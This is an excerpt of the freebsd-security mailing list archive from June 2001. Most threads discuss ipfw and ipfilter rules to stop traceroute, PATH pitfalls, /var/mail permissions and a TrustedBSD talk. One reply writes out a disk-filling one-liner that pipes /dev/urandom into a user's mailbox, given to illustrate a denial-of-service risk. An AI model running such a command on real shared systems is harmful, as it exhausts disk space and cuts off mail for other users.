+0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > Try this: > > ipfw add deny udp from any 32769-65535 to 33434-33523 As Karsten noted in a followup, this is not proper network practice. There might be a LOT of things listening on those UDP ports, including ephemeral outgoing UDP connections. As many other people noted, this does not stop Windows traceroute, which goes via ICMP. As the traceroute(8) manpage notes, this does not stop people who know how to use the traceroute '-p port' option to select a starting port != 32768. As Dag-Erling Smoerdgrav noted, in general it is impossible to disable a person determined to traceroute you, and in practice, there is no need to. G'luck, Peter PS. How was that now... one source: plagiarism, two sources: comparative study, three sources: an academic thesis.. I did even better than that! ;) -- Thit sentence is not self-referential because "thit" is not a word. > alexus wrote: > > > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 23:58:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from mta04.onebox.com (mta04.onebox.com [64.68.77.147]) by hub.freebsd.org (Postfix) with ESMTP id AEC4A37B437 for ; Sun, 24 Jun 2001 23:58:08 -0700 (PDT) (envelope-from ohshutup@zdnetmail.com) Received: from onebox.com ([10.1.101.9]) by mta04.onebox.com (InterMail vM.4.01.03.21 201-229-121-121-20010307) with SMTP id <20010625065808.HDO26282.mta04.onebox.com@onebox.com>; Sun, 24 Jun 2001 23:58:08 -0700 Received: from [24.176.48.110] by onebox.com with HTTP; Sun, 24 Jun 2001 23:58:08 -0700 Date: Sun, 24 Jun 2001 23:58:08 -0700 Subject: Re: IPF rule response [should be IPFW rule response instead] Reply-To: ohshutup@zdnetonebox.com From: "Kris Anderson" To: "Karsten W. Rohrbach" Cc: freebsd-security@FreeBSD.ORG Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit MIME-Version: 1.0 Message-Id: <20010625065808.HDO26282.mta04.onebox.com@onebox.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Oops, you are right. I am. doh... But none the less what is the 195. network trying to do with my system? I didn't initiate any requests from/to that system. Kris Anderson(ohshutup@zdnetmail.com)@2001.06.22 15:03:12 +0000: > Howdy folks, > > I've got a rule in my ipf that is reporting the following to syslog > > : <2>Jun 22 14:51:34 /kernel: ipfw: 3 Deny TCP 195.224.212.72:21 > :21 in via rl0 > > I have limited understanding but it looks like that some bonehead on > the 195. network is doing some sort of goofy ftp thing to my public_if, > almost as if it was ftp relaying. > > Could somebody unconfuse me as to what this means? > >it seems that you are mixing up ipf (ipfilter) and ipfw in the first >place. a properly configured ipfilter with ftp in-core proxy for >keeping state on the sessions would solve it i think. > /k -- > "In Christianity neither morality nor religion come into contact with > reality at any point." --Friedrich Nietzsche KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH SeniorTechie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E2964 BF46 Please do not remove my address from To: and Cc: fields in mailing lists.10x ___________________________________________________________________ To get your own FREE ZDNet Onebox - FREE voicemail, email, and fax, all in one place - sign up today at http://www.zdnetonebox.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 0: 0:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from kermit.netivity.nl (wc-68.r-195-85-144.essentkabel.com [195.85.144.68]) by hub.freebsd.org (Postfix) with ESMTP id EF94937B40A; Mon, 25 Jun 2001 00:00:29 -0700 (PDT) (envelope-from enriko.groen@netivity.nl) Received: by KERMIT with Internet Mail Service (5.5.2650.21) id ; Mon, 25 Jun 2001 09:00:28 +0200 Message-ID: <510EAC2065C0D311929200A0247252622F787C@NETIVITY-FS> From: Enriko Groen To: 'alexus' , freebsd-security@FreeBSD.ORG, freebsd-isp@freebsd.org Subject: RE: disable traceroute to my host Date: Mon, 25 Jun 2001 09:00:18 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > -----Original Message----- > From: alexus [mailto:ml@db.nexgen.com] > > is it possible to disable using ipfw so people won't be able > to traceroute > me? You could with IPfilter which has a fastroute option which will not lower the hopcount. However I think this will only work if you use this feature on a firewall. -- Enriko Groen, Hosting manager -------------------------------------------------------- netivity bv www.netivity.nl enriko.groen@netivity.nl 038 - 850 1000 van nagellstraat 4 8011 eb zwolle -------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 1:29:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from rinoa.prv.dev.itouchnet.net (devco.net [196.15.188.2]) by hub.freebsd.org (Postfix) with ESMTP id 7124737B406 for ; Mon, 25 Jun 2001 01:29:19 -0700 (PDT) (envelope-from ljb@devco.net) Received: from ljb by rinoa.prv.dev.itouchnet.net with local (Exim 3.30 #1) id 15ERkE-0000CJ-00; Mon, 25 Jun 2001 10:29:18 +0200 Date: Mon, 25 Jun 2001 10:29:18 +0200 From: Leon Breedt To: Ted Mittelstaedt Cc: freebsd-security@FreeBSD.ORG Subject: Re: Kernel Panic Message-ID: <20010625102918.A268@rinoa.prv.dev.itouchnet.net> References: <200106221156.AA442106040@stmail.pace.edu> <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com> User-Agent: Mutt/1.3.19i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 24, 2001 at 02:01:34AM -0700, Ted Mittelstaedt wrote: > That would be impossible unless you had "." in your path. If > you did (which is a very BAD thing) then yes your script probably > loaded itself (assuming you named it "pine). This is why the > system defaults to NOT having "." in the path. I'm not sure if everyone's aware of this (I wasn't), but an empty colon in your PATH is an implicit . (!!) i.e. PATH=/bin:/usr/bin:/usr/local/bin: In sh(1): 2. The shell searches each entry in PATH in turn for the command. The value of the PATH variable should be a series of entries separated by colons. Each entry consists of a directory name. The current directory may be indicated implicitly by an empty directory name, or explicitly by a single period. Regards, Leon. -- lj breedt coder "Threads are for people who can't program state machines." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 6:49:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from medianet-1v.grolier.fr (medianet-1v.grolier.fr [194.158.98.201]) by hub.freebsd.org (Postfix) with ESMTP id 5EF5837B405 for ; Mon, 25 Jun 2001 06:48:59 -0700 (PDT) (envelope-from yome@m6net.fr) Received: (from mnet@localhost) by medianet-1v.grolier.fr (8.9.3+Sun/8.9.3) id PAA07595 for freebsd-security@freebsd.org; Mon, 25 Jun 2001 15:48:32 +0200 (CEST) Date: Mon, 25 Jun 2001 15:48:32 +0200 (CEST) From: yome@m6net.fr To: freebsd-security@freebsd.org X-Mailer: Medianet/v1.14 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------------------------ Gagnez jusqu'=E0 3 millions de francs en jouant au JEU DE LA BOURSE sur http://www.jeudelabourse.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 7:14: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 1C25A37B406 for ; Mon, 25 Jun 2001 07:14:03 -0700 (PDT) (envelope-from robert@fledge.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.3/8.11.3) with SMTP id f5PEDkf82777 for ; Mon, 25 Jun 2001 10:13:46 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Mon, 25 Jun 2001 10:13:46 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: freebsd-security@FreeBSD.org Subject: Reminder: TrustedBSD paper at USENIX Technical Conference, FREENIX , track (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For those attending USENIX and interested in the TrustedBSD work, I'll be presenting a paper at the FREENIX track later this week. Some more details below; please see the USENIX conference schedule for time/location details. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services ---------- Forwarded message ---------- Date: Mon, 25 Jun 2001 10:12:35 -0400 (EDT) From: Robert Watson To: trustedbsd-discuss@TrustedBSD.org Subject: Reminder: TrustedBSD paper at USENIX Technical Conference, FREENIX , track This week the USENIX Annual Technical Conference is being held in Boston, MA--I'll be presenting a paper as part of its FREENIX track on the topic of some of the on-going TrustedBSD work, including EAs, ACLs, and initial work on MAC. The title and abstract of the paper are below; if you'll be at USENIX, I look forward to see you at that session, and welcome any questions or comments. TrustedBSD: Adding Trusted Operating System Features to FreeBSD Abstract Trusted operating systems provide a ``next level'' of system security, offering both new security features and higher assurance that they are properly implemented. TrustedBSD is an on-going project to integrate a number of trusted OS features into the open source FreeBSD operating system, and involves both architectural and development process improvements. This paper describes how the open source development practices of the FreeBSD Project impacted the design and implementation choices for these features, and describes lessons learned that will influence future work. Several key TrustedBSD features are discussed as examples of how new security services may be introduced in such an environment. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@trustedbsd.org with "unsubscribe trustedbsd-discuss" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 9:59: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id 9611437B401 for ; Mon, 25 Jun 2001 09:59:00 -0700 (PDT) (envelope-from jdicioccio@epylon.com) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id ; Mon, 25 Jun 2001 09:58:58 -0700 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA0166D9B4@goofy.epylon.lan> From: Jason DiCioccio To: 'Leonard Chung' , security@FreeBSD.ORG Subject: RE: "Correct" permissions on /var/mail? Date: Mon, 25 Jun 2001 09:58:51 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I use the freebsd default, although someone could still fill up /var if they wanted to.. (cat /dev/urandom >/var/mail/`whoami`) But 1777 they could create extra files, no? I'd rather not have a second /tmp.. Cheers, - -JD- - -----Original Message----- From: Leonard Chung [mailto:leonard@ssl.berkeley.edu] Sent: Sunday, June 24, 2001 2:12 PM To: security@FreeBSD.ORG Subject: "Correct" permissions on /var/mail? I was having a debate with a colleague the other day on the correct mode for /var/mail. He claimed that 1777 is more secure than what I've always had (the FreeBSD default of root:mail 775). 1777 gives you the additional benefit of protecting you from compromises on the mail group, but requires that on every machine quotas be installed even for machines with just one or two users. Without quotas, a malicious user could fill up /var/mail creating a DoS for everybody receiving mail off that machine. 775 doesn't protect against compromises of the mail group, but has the added benefit that it protects against a user filling /var/mail inadvertently as they would have to purposely send lots of e-mail. Which do most of you use? Is there a reason /var/mail is initially set to 775 rather than 1777? Thanks, Leonard - -- Leonard Chung - SETI@home - The Search for Extraterrestrial Intelligence @ home http://www.setiathome.ssl.berkeley.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use iQA/AwUBOzdupVCmU62pemyaEQK3RwCgzkfVW04EYczOaPU7bJrNb1RQM2wAn0tI VBfsNr+Jg1j6n+S40M4QXRMA =RbAH -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:21:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id D6A8237B406 for ; Mon, 25 Jun 2001 12:21:35 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 13698 invoked from network); 25 Jun 2001 19:22:23 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:22:23 -0000 Message-ID: <005f01c0fdac$15221010$9865fea9@book> From: "alexus" To: , References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:21:49 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org the thing is that windows based machines they using icmp for traceroute and unix uses udp.. what i'd like to know is: which type of icmp uses for traceroute? (for example by deny icmp for incoming icmptype 8 i was able to deny any pinging of my box from outside *BUT* i can ping everyone myself from my box) also i'd like to know which standard range of ports udp uses in unix's traceroute? ----- Original Message ----- From: "Kris Anderson" To: Sent: Friday, June 22, 2001 7:02 PM Subject: Re: disable traceroute to my host > You can put in a rule like > > ipfw add 3 deny icmp from any to FF.FF.FF.FF via F0 > > change FF.FF.FF.FF to the ip address of your outside ip address > change F0 to the interface name of said outside interface > > now I don't know about directly blocking traceroutes only but traceroute > does an icmp thing somewhat like ping. > > Problem is that this will stop all ICMP from coming into the interface > from the outside, even ICMP responses. > > For example, you can traceroute out, but traceroute responses now get > blocked (This includes anything that uses ICMP) does not get back in > because it is being blocked by the above rule. Think of it as one way > mirror. > > Now, if anybody knows of a more subtler way to allow ICMP out and back > in, but keep any externals from coming in I certainly am one who would > like to know. > -- > Kris Anderson > ohshutup@zdnetonebox.com - email > (408) 514-2611 ext. 1178 - voicemail/fax > > > > ---- "alexus" wrote: > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > ___________________________________________________________________ > To get your own FREE ZDNet Onebox - FREE voicemail, email, and fax, > all in one place - sign up today at http://www.zdnetonebox.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:22:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 5B51C37B406 for ; Mon, 25 Jun 2001 12:22:40 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 13720 invoked from network); 25 Jun 2001 19:23:28 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:23:28 -0000 Message-ID: <006e01c0fdac$3be0e2d0$9865fea9@book> From: "alexus" To: "Brooks Davis" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <20010622160443.A29783@Odin.AC.HMC.Edu> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:22:54 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i understand that i only will be able to "hide" my last hop for eveyrone and not every others;) ----- Original Message ----- From: "Brooks Davis" To: "alexus" Cc: ; Sent: Friday, June 22, 2001 7:04 PM Subject: Re: disable traceroute to my host To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:30:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3B07437B405 for ; Mon, 25 Jun 2001 12:30:28 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id VAA88348; Mon, 25 Jun 2001 21:30:21 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "alexus" Cc: , Subject: Re: disable traceroute to my host References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <005f01c0fdac$15221010$9865fea9@book> From: Dag-Erling Smorgrav Date: 25 Jun 2001 21:30:20 +0200 In-Reply-To: <005f01c0fdac$15221010$9865fea9@book> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "alexus" writes: > which type of icmp uses for traceroute? (for example by deny icmp for > incoming icmptype 8 i was able to deny any pinging of my box from outside > *BUT* i can ping everyone myself from my box) Don't bother, just block all incoming packets with a ttl of 1. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:31:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id AAC3637B40A for ; Mon, 25 Jun 2001 12:31:53 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 13834 invoked from network); 25 Jun 2001 19:32:40 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:32:40 -0000 Message-ID: <00a001c0fdad$84c5d0e0$9865fea9@book> From: "alexus" To: "Dag-Erling Smorgrav" Cc: , References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com><005f01c0fdac$15221010$9865fea9@book> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:32:06 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org that's what i wanted to do at first place!:) i didn't know if its possible.. is it? ----- Original Message ----- From: "Dag-Erling Smorgrav" To: "alexus" Cc: ; Sent: Monday, June 25, 2001 3:30 PM Subject: Re: disable traceroute to my host > "alexus" writes: > > which type of icmp uses for traceroute? (for example by deny icmp for > > incoming icmptype 8 i was able to deny any pinging of my box from outside > > *BUT* i can ping everyone myself from my box) > > Don't bother, just block all incoming packets with a ttl of 1. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:32:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 0B00537B409 for ; Mon, 25 Jun 2001 12:32:29 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 13858 invoked from network); 25 Jun 2001 19:33:17 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:33:17 -0000 Message-ID: <00bc01c0fdad$9ac03070$9865fea9@book> From: "alexus" To: "valence" Cc: , References: Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:32:43 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org thank you i'll take a look at that ----- Original Message ----- From: "valence" To: "alexus" Cc: ; Sent: Saturday, June 23, 2001 1:20 PM Subject: Re: disable traceroute to my host http://www.lovric.net/antiroute On Fri, 22 Jun 2001, alexus wrote: ­­» is it possible to disable using ipfw so people won't be able to traceroute ­­» me? ­­» ­­» ­­» ­­» To Unsubscribe: send mail to majordomo@FreeBSD.org ­­» with "unsubscribe freebsd-isp" in the body of the message ­­» To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:34:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 282E037B405 for ; Mon, 25 Jun 2001 12:34:22 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id VAA88378; Mon, 25 Jun 2001 21:34:17 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "alexus" Cc: , Subject: Re: disable traceroute to my host References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <005f01c0fdac$15221010$9865fea9@book> <00a001c0fdad$84c5d0e0$9865fea9@book> From: Dag-Erling Smorgrav Date: 25 Jun 2001 21:34:16 +0200 In-Reply-To: <00a001c0fdad$84c5d0e0$9865fea9@book> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "alexus" writes: > that's what i wanted to do at first place!:) > > i didn't know if its possible.. is it? We write man pages for a reason. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:39:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id DAC5137B405 for ; Mon, 25 Jun 2001 12:39:22 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id NAA11397; Mon, 25 Jun 2001 13:39:11 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id NAA16461; Mon, 25 Jun 2001 13:39:06 -0600 (MDT) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15159.37721.944609.942116@nomad.yogotech.com> Date: Mon, 25 Jun 2001 13:39:05 -0600 (MDT) To: "Karsten W. Rohrbach" Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host In-Reply-To: <20010624181614.E52432@mail.webmonster.de> References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <20010624181614.E52432@mail.webmonster.de> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > hehe, reminds me of this customer's nokia ip-330 sitting in the corner > of my lab -- i probably will wipe ipso and this weird-ass checkpoint > fw1, replace it with freebsd and ipfilter :-> Except you'd be replacing the ip-330 running FreeBSD with another box running FreeBSD. Nate (or Nate.Williams@nokia.com ;) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:39:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 3349D37B405 for ; Mon, 25 Jun 2001 12:39:30 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 13941 invoked from network); 25 Jun 2001 19:40:18 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:40:18 -0000 Message-ID: <00fd01c0fdae$95c16430$9865fea9@book> From: "alexus" To: "Fernando Gleiser" Cc: References: <20010622221554.K5703-100000@cactus.fi.uba.ar> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:39:44 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org only for incoming? or for outgoing as well? ----- Original Message ----- From: "Fernando Gleiser" To: "alexus" Cc: Sent: Friday, June 22, 2001 9:23 PM Subject: Re: disable traceroute to my host > On Fri, 22 Jun 2001, alexus wrote: > > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > I don't know if it is posible with ipfw, but with ip filter you can add > a rule to block any packets with ttl=1: > > block in log quick on xl0 ttl 1 proto ip all > > That will stop windows traceroute (icmp based) as well as unix traceroute > (udp based). > > Unix traceroute uses udp packets with destination port > 33434, but this can > be changed. As far as I know, the only way to stop traceroute is to drop > any packet with ttl=1. This might block legitimate trafic, but I haven't > seen any packet in the wild with ttl=1 wich was not a traceroute. > > > Hope this helps. > Fer > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:40:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 5985237B406 for ; Mon, 25 Jun 2001 12:40:09 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 13969 invoked from network); 25 Jun 2001 19:40:57 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:40:57 -0000 Message-ID: <010b01c0fdae$ad19a610$9865fea9@book> From: "alexus" To: "Dag-Erling Smorgrav" Cc: , References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com><005f01c0fdac$15221010$9865fea9@book><00a001c0fdad$84c5d0e0$9865fea9@book> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:40:23 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 